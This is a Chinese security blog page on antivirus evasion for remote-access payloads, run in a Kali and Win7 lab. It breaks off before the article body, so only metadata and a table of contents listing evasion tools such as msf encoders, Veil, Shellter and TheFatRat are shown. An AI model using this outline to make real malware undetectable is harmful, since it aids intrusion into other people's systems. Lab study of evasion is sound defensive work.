<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/rabbit.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/rabbit_16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>
<meta name="description" content="远控免杀——工具篇前言免杀对个人而言是一个熟悉又陌生的概念，之前只知道msf上进行简单的encode来免杀，现在还是从基本的工具开始学起 实验环境采用Kali+Win7虚拟机，测试机安装360全家桶">
<meta property="og:type" content="article">
<meta property="og:title" content="远控免杀——工具篇">
<meta property="og:url" content="http://example.com/2022/02/15/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E5%B7%A5%E5%85%B7%E7%AF%87/index.html">
<meta property="og:site_name" content="Jasontt&#39;s Blog">
<meta property="og:description" content="远控免杀——工具篇前言免杀对个人而言是一个熟悉又陌生的概念，之前只知道msf上进行简单的encode来免杀，现在还是从基本的工具开始学起 实验环境采用Kali+Win7虚拟机，测试机安装360全家桶">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210193805172.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210201725861.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210201847245.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202657179.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202821265.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202853855.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203326937.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203539659.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203553483.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203627448.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210205818844.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210205930063.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210210357725.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154339417.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154547017.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154144937.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211155757515.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211171158049.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211170422141.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211173556181.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211174519477.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211210737098.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211195832317.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211210316878.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211211221212.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212125645235.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212130536451.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212130803057.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212140152504.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212180240192.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212180215659.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212181426434.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212182138145.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212183258116.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212202336610.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212202635077.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212203218057.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212203907952.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212204141231.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212204501644.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212211144925.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212211726185.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215442859.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215316449.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215104051.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215908266.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212221042746.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212225126509.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212221714694.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212230929914.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212231102345.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232114869.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232546093.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232815419.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212233613004.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151041983.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151355065.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151612441.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215152616661.png">
<meta property="og:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215152829223.png">
<meta property="article:published_time" content="2022-02-15T07:41:26.000Z">
<meta property="article:modified_time" content="2022-02-23T06:19:54.043Z">
<meta property="article:author" content="Jason Tu">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="免杀">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210193805172.png">


<link rel="canonical" href="http://example.com/2022/02/15/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E5%B7%A5%E5%85%B7%E7%AF%87/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2022/02/15/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E5%B7%A5%E5%85%B7%E7%AF%87/","path":"2022/02/15/远控免杀——工具篇/","title":"远控免杀——工具篇"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>远控免杀——工具篇 | Jasontt's Blog</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Jasontt's Blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
        <li class="menu-item menu-item-schedule"><a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>Schedule</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E5%B7%A5%E5%85%B7%E7%AF%87"><span class="nav-number">1.</span> <span class="nav-text">远控免杀——工具篇</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#msf%E8%87%AA%E5%B8%A6%E5%85%8D%E6%9D%80"><span class="nav-number">1.2.</span> <span class="nav-text">msf自带免杀</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E5%A7%8Bpayload"><span class="nav-number">1.2.1.</span> <span class="nav-text">原始payload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%96%E7%A0%81%E5%A4%84%E7%90%86"><span class="nav-number">1.2.2.</span> <span class="nav-text">编码处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8D%86%E7%BB%91"><span class="nav-number">1.2.3.</span> <span class="nav-text">捆绑</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8D%86%E7%BB%91-%E7%BC%96%E7%A0%81"><span class="nav-number">1.2.4.</span> <span class="nav-text">捆绑+编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%9A%E9%87%8D%E7%BC%96%E7%A0%81-%E6%8D%86%E7%BB%91"><span class="nav-number">1.2.5.</span> <span class="nav-text">多重编码+捆绑</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Evasion%E6%A8%A1%E5%9D%97"><span class="nav-number">1.2.6.</span> <span class="nav-text">Evasion模块</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#exe"><span class="nav-number">1.2.6.1.</span> <span class="nav-text">exe</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#hta"><span class="nav-number">1.2.6.2.</span> <span class="nav-text">hta</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#install-util"><span class="nav-number">1.2.6.3.</span> <span class="nav-text">install_util</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-number">1.2.7.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Veil"><span class="nav-number">1.3.</span> <span class="nav-text">Veil</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85"><span class="nav-number">1.3.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8"><span class="nav-number">1.3.2.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exe-1"><span class="nav-number">1.3.3.</span> <span class="nav-text">exe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Veil-mingw-w64"><span class="nav-number">1.3.4.</span> <span class="nav-text">Veil+mingw-w64</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Venom"><span class="nav-number">1.4.</span> <span class="nav-text">Venom</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shellter"><span class="nav-number">1.5.</span> <span class="nav-text">Shellter</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-1"><span class="nav-number">1.5.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-1"><span class="nav-number">1.5.2.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-1"><span class="nav-number">1.5.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BackDoor-Factory"><span class="nav-number">1.6.</span> <span class="nav-text">BackDoor-Factory</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-2"><span class="nav-number">1.6.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-2"><span class="nav-number">1.6.2.</span> <span class="nav-text">使用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E6%B5%8B%E8%AF%95"><span class="nav-number">1.6.2.1.</span> <span class="nav-text">程序测试</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%90%9C%E7%B4%A2Code-Caves"><span class="nav-number">1.6.2.2.</span> <span class="nav-text">搜索Code Caves</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96payload"><span class="nav-number">1.6.2.3.</span> <span class="nav-text">获取payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%94%9F%E6%88%90payload"><span class="nav-number">1.6.2.4.</span> <span class="nav-text">生成payload</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-2"><span class="nav-number">1.6.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Avet"><span class="nav-number">1.7.</span> <span class="nav-text">Avet</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TheFatRat"><span class="nav-number">1.8.</span> <span class="nav-text">TheFatRat</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Avoidz"><span class="nav-number">1.9.</span> <span class="nav-text">Avoidz</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Green-Hat-Suite"><span class="nav-number">1.10.</span> <span class="nav-text">Green-Hat-Suite</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#zirikatu"><span class="nav-number">1.11.</span> <span class="nav-text">zirikatu</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-3"><span class="nav-number">1.11.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-3"><span class="nav-number">1.11.2.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-3"><span class="nav-number">1.11.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#AVIator"><span class="nav-number">1.12.</span> <span class="nav-text">AVIator</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-4"><span class="nav-number">1.12.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-4"><span class="nav-number">1.12.2.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-4"><span class="nav-number">1.12.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DKMC"><span class="nav-number">1.13.</span> <span class="nav-text">DKMC</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-5"><span class="nav-number">1.13.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-5"><span class="nav-number">1.13.2.</span> <span class="nav-text">使用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E6%AD%A5"><span class="nav-number">1.13.2.1.</span> <span class="nav-text">第一步</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E6%AD%A5"><span class="nav-number">1.13.2.2.</span> <span class="nav-text">第二步</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%89%E6%AD%A5"><span class="nav-number">1.13.2.3.</span> <span class="nav-text">第三步</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E5%9B%9B%E6%AD%A5"><span class="nav-number">1.13.2.4.</span> <span class="nav-text">第四步</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%BA%94%E6%AD%A5"><span class="nav-number">1.13.2.5.</span> <span class="nav-text">第五步</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%90%E8%A1%8C%E6%95%88%E6%9E%9C"><span class="nav-number">1.13.3.</span> <span class="nav-text">运行效果</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-5"><span class="nav-number">1.13.4.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Unicorn"><span class="nav-number">1.14.</span> <span class="nav-text">Unicorn</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-6"><span class="nav-number">1.14.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%94%A8%E6%B3%95"><span class="nav-number">1.14.2.</span> <span class="nav-text">用法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-6"><span class="nav-number">1.14.3.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-6"><span class="nav-number">1.14.4.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Python-Rootkit"><span class="nav-number">1.15.</span> <span class="nav-text">Python-Rootkit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ASWCrypter"><span class="nav-number">1.16.</span> <span class="nav-text">ASWCrypter</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-7"><span class="nav-number">1.16.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-7"><span class="nav-number">1.16.2.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-7"><span class="nav-number">1.16.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#nps-payload"><span class="nav-number">1.17.</span> <span class="nav-text">nps_payload</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-8"><span class="nav-number">1.17.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-8"><span class="nav-number">1.17.2.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-8"><span class="nav-number">1.17.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HERCULES"><span class="nav-number">1.18.</span> <span class="nav-text">HERCULES</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SpookFlare"><span class="nav-number">1.19.</span> <span class="nav-text">SpookFlare</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-9"><span class="nav-number">1.19.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-9"><span class="nav-number">1.19.2.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-9"><span class="nav-number">1.19.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SharpShooter"><span class="nav-number">1.20.</span> <span class="nav-text">SharpShooter</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-10"><span class="nav-number">1.20.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-10"><span class="nav-number">1.20.2.</span> <span class="nav-text">使用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.20.2.1.</span> <span class="nav-text"></span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-10"><span class="nav-number">1.20.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CACTUSTORCH"><span class="nav-number">1.21.</span> <span class="nav-text">CACTUSTORCH</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-11"><span class="nav-number">1.21.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-11"><span class="nav-number">1.21.2.</span> <span class="nav-text">使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93-11"><span class="nav-number">1.21.3.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.22.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Jason Tu"
      src="/images/touxiang.jpg">
  <p class="site-author-name" itemprop="name">Jason Tu</p>
  <div class="site-description" itemprop="description">一只谦虚的兔子</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://4xwi11.github.io/" title="https:&#x2F;&#x2F;4xwi11.github.io&#x2F;" rel="noopener" target="_blank">4xwi11</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://scr1pt-kid.github.io/" title="https:&#x2F;&#x2F;scr1pt-kid.github.io&#x2F;" rel="noopener" target="_blank">Scr1pt</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.yuque.com/jinjinshigekeaigui" title="https:&#x2F;&#x2F;www.yuque.com&#x2F;jinjinshigekeaigui" rel="noopener" target="_blank">Jiang</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/yunqian2017" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;yunqian2017" rel="noopener" target="_blank">Openg</a>
        </li>
    </ul>
  </div>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/02/15/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E5%B7%A5%E5%85%B7%E7%AF%87/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpg">
      <meta itemprop="name" content="Jason Tu">
      <meta itemprop="description" content="一只谦虚的兔子">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Jasontt's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          远控免杀——工具篇
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
